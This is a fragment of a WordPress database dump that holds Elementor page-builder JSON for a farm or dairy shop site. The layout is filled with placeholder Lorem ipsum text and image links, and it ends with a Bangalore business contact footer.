th\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}]},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":89.680999999999997,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":10.272},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"14a6bb1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"785d463\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#E1D7D74F\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5ccfaed\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8e25cb7\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"f4996be\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6f2a1f5\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"24f8373\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3cd3a5c\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"dc5078a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0324abe\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c08eed2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3845821\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d7c7592\",\"elType\":\"widget\",\"settings\":{\"form_id\":\"1527\"},\"elements\":[],\"widgetType\":\"wpforms\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8932,1535,'_elementor_page_assets','a:0:{}'),(8934,1536,'_elementor_edit_mode','builder'),(8935,1536,'_elementor_template_type','wp-page'),(8936,1536,'_elementor_version','3.7.8'),(8937,1536,'_wp_page_template','elementor_canvas'),(8938,1536,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}]},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":89.680999999999997,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":10.272},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 